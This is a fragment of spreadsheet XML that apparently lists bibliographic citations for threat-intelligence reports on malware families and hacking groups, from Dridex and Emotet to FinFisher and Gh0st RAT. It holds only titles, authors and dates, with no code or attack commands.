    <t>ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. Retrieved December 22, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Proofpoint. (2016, July 7). DroidJack Uses Side-Load…It's Super Effective! Backdoored Pokemon GO Android App Found. Retrieved January 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Dsquery. Retrieved April 18, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Elovitz, S. &amp; Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated &amp; Spear-Phishing Group. Retrieved February 26, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab. (2015, June 11). The Duqu 2.0. Retrieved April 21, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Brewster, T. (2017, May 4). https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a. Retrieved June 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>M.Léveillé, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cimpanu, C.. (2017, March 29). Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware. Retrieved April 23, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybleinc. (2020, October 31). Egregor Ransomware – A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Meskauskas, T.. (2020, October 29). Egregor: Sekhmet’s Cousin. Retrieved January 6, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Joe Security. (n.d.). Analysis Report fasm.dll. Retrieved January 6, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hinchliffe, A. Santos, D.. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Baumgartner, K.. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Winters, R.. (2015, December 20). The EPS Awakens - Part Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Xiaopeng Zhang. (2017, May 3). Deep Analysis of New Emotet Variant – Part Retrieved April 1, 2019.</t>
  </si>
  <si>
    <t>Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Perez, D.. (2018, December 28). Analysis of the latest Emotet propagation campaign. Retrieved April 16, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ASEC. (2017). ASEC REPORT VOL.8Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&amp;CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Stepanic, D. (2018, September 2). attck_empire: Generate ATT&amp;CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Robertson, K. (2015, April 2). Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Retrieved March 11, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ESET. (2018, August). Turla Outlook Backdoor: Analysis of an unusual Turla backdoor. Retrieved March 11, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Boutin, J. and Faou, M. (2018). Visiting the snake nest. Retrieved May 7, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Red Canary. (2021, March 31). 2021 Threat Detection Report. Retrieved August 31, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cary, M. (2018, December 6). Locked File Access Using ESENTUTL.exe. Retrieved September 5, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved January 28, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Expand.exe. Retrieved February 19, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Somerville, L. and Toro, A. (2017, March 30). Playing Cat &amp; Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FinFisher. (n.d.). Retrieved December 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 2Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Matthews, M. and Backhouse, W. (2021, June 15). Handy guide to a new Fivehands ransomware variant. Retrieved June 24, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gostev, A. (2012, May 30). Flame: Bunny, Frog, Munch and BeetleJuice…. Retrieved March 1, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA50Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FlexiSpy. (n.d.). FlexiSpy. Retrieved September 4, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis &amp; Internals. Retrieved September 8, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FINRetrieved June 1, 2016.</t>
  </si>
  <si>
    <t>Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wikipedia. (2016, June 15). File Transfer Protocol. Retrieved July 20, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG0Retrieved December 10, 2020.</t>
  </si>
  <si>
    <t>Bryan Lee and Rob Downs. (2016, February 12). A Look Into Fysbis: Sofacy’s Linux Backdoor. Retrieved September 10, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.Retrieved December 7, 2017.</t>
  </si>
  <si>
    <t>ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Alintanahin, K. (2014, March 13). Kunming Attack Leads to Gh0st RAT Variant. Retrieved November 12, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-019Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Adair, S. (2017, February 17). Detecting and Responding to Advanced Threats within Exchange Environments. Retrieved March 20, 2017.</t>
  </si>
  <si>
    <t>Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.</t>
  </si>
  <si>
    <t>Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.</t>
  </si>
  <si>
    <t>CyberESI. (2011). TROJAN.GTALK. Retrieved June 29, 2015.</t>
  </si>
  <si>
    <t>R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020.</t>
  </si>
  <si>
    <t>Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.</t>
  </si>
  <si>
    <t>Trustwave SpiderLabs. (2020, June 26). GoldenSpy: Chapter Two – The Uninstaller. Retrieved July 23, 2020.</t>
  </si>
